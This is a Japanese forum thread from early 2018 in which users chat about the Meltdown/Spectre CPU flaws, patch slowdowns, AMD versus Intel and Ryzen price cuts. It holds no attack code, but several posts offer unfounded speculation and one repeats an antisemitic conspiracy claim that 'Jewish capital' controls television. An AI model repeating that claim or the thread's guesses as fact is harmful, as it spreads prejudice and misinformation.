それくらいみんなやってるだろう
2ちゃんにはハック・クラック板があったくらい
ハッカーがごろごろいたからな >>462
バランスは良いんだけど絶対性能が低いんだよな
RyzenはOCしても全コア4Gあたりが限界だし >>464
APUになる世代はZen+と言われてた20000番台だからな
なんもしてないとは思えん >>468
多分GPUに手を出してなかったら倒産してたぞ >>469
その通りとは思うけど、firepro系以外は安定しないからなぁ。 >>468
GPUに手出したおかげでコンシューマ機組み込み用APU需要でここまで生き長らえたんだよなあ 今のコンシューマ機がAMDだらけなのはGPUのおかげなんやで >>473
今更気がついたけどJavaScriptでくあプロセスを取得できるってセーブデータもいじれるようになるのかw
スイッチ厳しいからクラックがすぐに広まりそうだなwww >>457
ゲームには影響ないとか言ってたけど
BIOSアプデも当てると違ってくるのかな・・・
温度上がってるってことは消費電力も上がってそうだな
むむこれからどうなるんだ 後ろにTurboとかZとか付くとよりワクワクするよ。 >>480
大丈夫
既に3世代前ですら非常に困難だから >>180
アイソレーションをきちんとしたアーキテクトと運用監視でマルチクライアントの抽象化インスタンス同士をわけるが。
どんなに簡単に運用監視に侵入しないでデータ閲覧し放題何ですか? 時間貸している仮想サーバならともかく、クライアントなら不正なプログラムをインストールして実行すると情報が漏れるセキュリティリスクがあるという話にしかならないのにね。 はい、パブリッククラウドとプライベートクラウド(閉塞利用)はやはり適材適所ですね
セクリョンごとにプライベートクラウド使っていれば各コンピュテーショナルノードへpatch適用をしなくても問題ない場合があると思う
あす、PDFを読んでみよう つーかintelのパッチとbiosのパッチとやらはどこでダウンロードすればいいの? 【エラッタ】IntelのCPUに深刻な欠陥 Core i世代以降が対象 パッチを当てると性能30〜35%低下
https://asahi.5ch.net/test/read.cgi/newsplus/1514966335/
intelのCPUに重大なバグ。修正により性能30%ダウンは確実。 もちろんcoffeeも対象 [589351131]
https://leia.5ch.net/test/read.cgi/poverty/1514960738/
【Corei全部ダメ】IntelCPUに重大セキュリティバグ発覚 修正で性能3割ダウンへ
https://krsw.5ch.net/test/read.cgi/ghard/1514967453/ _ ―- ‐- 、
(r/ -─二:.:.:ヽ インテル、おわったな。
7''´ ̄ヽ-─<:.:.', __
. 〈t< く=r‐、\:く _ ...-::‐::¬::::: ̄:::::::::::::::::::::::::::::::
∠j ` / ,j={_/ヽヽr' >:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
. っ Y _/ ヽ了 /:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
. し イ --─¬ /::::::/:/|:::/::∧:::∧:::::::::::::::::::::::::::::::::::
f: :_: : :_:_:_└ 、 |/f|/|/ .|/ |/ ∨ ヽ|\:::::::::::::::::::::::::
/-ー/: : : : : : :\ { ヘ::::::::::::::::::::: あぁ
/7: : : :r: : : : : : : : : } ', .j / } .}::::::::::::::::::::
/: : : : : :.|: :j: : : :\: : j } /_ ミ ヘ::::::::::::::::::
/: : : : : : : j: ヘ、: : : : \| /く<l´::<ニ二 ̄`> ミ:::::::::/
./: : : : : : : \::::ヘ: : : : : : :ヽ {::ア{:::::::}厂¨,`_______j:::::://
{: : : : : : : : : : ヘ:::ヘ: : : : : : :', V ヘ::::ノ` ̄  ̄ ̄ ̄ ̄ .{::::|ヽ
',: : : : : : : : : : : :\ヘ: : : : : :ヘ. / ヘ¨ //:}::::|/
',: : : : : : : :::::::::::::::::::〉: :_:_.r--―く >ヽ / _ノ::::{ _/
'; : : : :.::::::::::::::::::::::r</ :.:.. `ー¬\__ /::::/
〈: : : : :ー---‐‐r―'´ :.:.:. ヘ: . ヽ . . }ー、 ./::::<
〈: : : : : : : : : : 〈r-‐、:.:.:.:ヘ.:.:.:.:. ', : : ',: . .|: : 〉 /:::::::/ >>488
Ryzenの値下げ
https://videocardz.com/74696/amd-announces-ryzen-1000-series-price-cuts
R7 1800X $499=>$349
R7 1700X $399=>$309
R7 1700 $329=>$299
R5 1600X $249=>$219
R5 1600 $219=>$189
R5 1500X $189=>$174
R5 2400G 4C8T $169 i5-7400対抗
R3 2200G 4C4T $99 i3-7100対抗 >>487
DIYはBIOSはマザーボードのメーカーかな
メーカー製はメーカーのサイトでbios出るはず
インテルのパッチはマイクロソフトかな >>211
ITリテラシーが低い割に金だけは持ってる日本人のクレカ情報おいしいです >>213
実際にFifrefoxではアップデートで一部機能が無効化されたりタイマーの精度を落とすなどの緊急対応がされた パソコンが売れないから、こうやって核爆弾並の地雷をわざと埋め込んでおいて
定期的に炸裂させる作戦なんじゃないの 今頃ハッカー達がこの脆弱性使ったアプリケーションやJavaScriptで検証中だろな
今月中には悪意のあるサイトはヤバイよね
踏んだだけでパスワード駄々漏れ エラったって書いてあるから在日問題のスレかと思ったのに。 >>499
Googleのセキュリティチームはハッカーの集まりやで サーバ機が外部からスクリプトを実行される可能性ってどのくらいあるの? >>501
googleだけにハッカーが居るわけではないんやでw 日本ではどんだけインテルがクソやらかしても優位は動かないだろうな
国産信仰もそうだが、ブランドを信じてクソだと疑いすらしない Intel、AMD GPUを1パッケージに統合した新CPUを正式発表
〜Core i7-7700HQ+GeForce GTX 1060を上回る性能を実現
https://pc.watch.impress.co.jp/docs/news/event/1099879.html
Intel、Radeon一体型CPU搭載でVRゲームも対応可能な超小型PC
https://pc.watch.impress.co.jp/docs/news/event/1099881.html
HPからもAMD GPU内蔵Intel CPU搭載の15型2in1「HP Spectre x360 15」
〜展示機でのベンチマーク結果も掲載
https://pc.watch.impress.co.jp/docs/news/event/1099917.html 休みの間ARMヤバいて騒いでたみたいだけど、A75以外にも見つかったんか?
それとも前の馬鹿淫厨がまた工作してるだけ? >>507
iPhoneとかまさにそれ
日本はブランド信仰がひどすぎる そもそも一般人はこの件微塵も知らんからな
ユダヤ資本配下のテレビが取り上げない以上認知されずに沈静化する 未だにK10使ってるけどそのまま使えって事なんだwww 去年の春にgoogleから脆弱性を指摘されたintelは
全社をあげてRyzenの防壁を突破しようと日夜努力してるが
未だ朗報は聞こえて来ない。これでは大intelの名が・・・
この際intel社のリソース全てをAMDCPUの防壁突破に賭けるべきではないだろうか、
今までの製品の対策?新規CPUの開発?いやそんな事には構ってられない
何とかしてAMDの壁を突破しない限り大intelに明日は無いw プロセッサの脆弱性問題「メルトダウン」「スペクター」対応パッチでAMDユーザーの一部がPCを使えなくなる恐れ
https://gigazine.net/news/20180109-meltdown-spectre-patch-amd-unusable/
Athlon64みたいな骨董品まだ使ってるやつは替え時だな。 >>515
K10のAthlonなら平気平気
K8はアカンみたいね これでAMDがTOPの座確定かな
一度使った事あるけど、その時は別のパーツが壊れてそれきりだったわ
次はAMDで え、わいのopt146ちゃんもパッチ当てたらうごかなくなるんか…
っていうかXPいれてオフライン専用だから関係ないや… ■ このスレッドは過去ログ倉庫に格納されています